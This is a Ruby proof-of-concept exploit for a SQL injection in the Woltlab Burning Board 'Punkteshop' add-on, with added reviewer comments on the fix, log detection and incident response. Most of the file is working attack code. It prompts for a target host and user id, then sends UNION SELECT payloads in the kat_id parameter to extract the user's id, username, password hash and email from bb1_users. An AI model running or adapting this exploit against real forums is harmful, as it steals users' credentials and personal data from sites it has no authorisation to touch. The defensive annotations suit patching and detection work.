[php]
#!/usr/bin/ruby
#Discovered and vulnerability by Easy Laster
#
# Proof-of-concept for the SQL injection named in the banner below (Woltlab
# Burning Board "Punkteshop" add-on). The script sends four GET requests to
# punkteshop.php, each carrying a UNION SELECT in the kat_id query parameter,
# and prints one bb1_users column per request: userid, username, password, email.
#
# NOTE(review): the request shape implies punkteshop.php places kat_id into a
# SQL statement without binding or integer-casting it -- confirm against the
# add-on source. The fix belongs there: cast kat_id to an integer or pass it
# as a bound parameter.
#
# Detection: in web-server logs, look for punkteshop.php requests whose kat_id
# contains UNION/SELECT, a 15-value column list, bb1_users, or runs of 0x23.
# Match on those stable parts; the quote and dash characters in this listing
# are typographic as rendered by the page and are not reliable signature material.
# Response: a matching request reads the password column, so the stored
# credential of the queried account should be treated as exposed.
print "
############################################################
# 4004-Security-Project #
############################################################
# Woltlab Burning Board Punkteshop Hack SQL Injection #
# Exploit #
# Using Host+Path+id #
# www.demo.de /wbb/ 1 #
# Easy Laster #
############################################################
"
require ’net/http‘
# Separator line printed between the prompts.
block = "#########################################################"
# Three values are read from stdin: host, script path and a user id.
# None of them is validated before being used in the request below.
print ""+ block +""
print "\nEnter host name (site.com)->"
host=gets.chomp
print ""+ block +""
print "\nEnter script path (/wbb/)->"
path=gets.chomp
print ""+ block +""
print "\nEnter the id (id)->"
userid=gets.chomp
print ""+ block +""
# Any exception raised below (a connection error, or calling [1] on the nil
# that match returns when the marker is absent) ends up in the bare rescue.
begin
# Request 1: userid column. concat() wraps the selected value in five 0x23
# bytes ('#') on each side and sits in position 5 of a 15-value UNION list
# (presumably the column punkteshop.php echoes into the page). The id typed
# at the prompt is appended to the WHERE clause as entered.
dir = "punkteshop.php?kat_id=’+UNION+SELECT+1,2,3,4,concat(0x23,0"+
"x23,0x23,0x23,0x23,userid,0x23,0x23,0x23,0x23,0x23),6,7,"+
"8,9,10,11,12,13,14,15+from+bb1_users+where+userid="+userid+"–+"
# Plain HTTP on port 80; a new Net::HTTP object is created for every request.
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
# Pull the text between the ##### markers out of the response body.
print "\nUserid -> "+(/#####(.+)#####/).match(resp.body)[1]
# Request 2: same query, selecting the username column.
dir = "punkteshop.php?kat_id=’+UNION+SELECT+1,2,3,4,concat(0x23,0"+
"x23,0x23,0x23,0x23,username,0x23,0x23,0x23,0x23,0x23),6,7,"+
"8,9,10,11,12,13,14,15+from+bb1_users+where+userid="+userid+"–+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nUsername -> "+(/#####(.+)#####/).match(resp.body)[1]
# Request 3: same query, selecting the password column.
dir = "punkteshop.php?kat_id=’+UNION+SELECT+1,2,3,4,concat(0x23,0"+
"x23,0x23,0x23,0x23,password,0x23,0x23,0x23,0x23,0x23),6,7,"+
"8,9,10,11,12,13,14,15+from+bb1_users+where+userid="+userid+"–+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nUPassword -> "+(/#####(.+)#####/).match(resp.body)[1]
# Request 4: same query, selecting the email column.
dir = "punkteshop.php?kat_id=’+UNION+SELECT+1,2,3,4,concat(0x23,0"+
"x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23),6,7,"+
"8,9,10,11,12,13,14,15+from+bb1_users+where+userid="+userid+"–+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]
print "\n#########################################################"
# Bare rescue: every StandardError is reported with the same generic message,
# so a network failure and a missing marker are indistinguishable here.
rescue
print "\nExploit failed or hackblock"
end
[/php]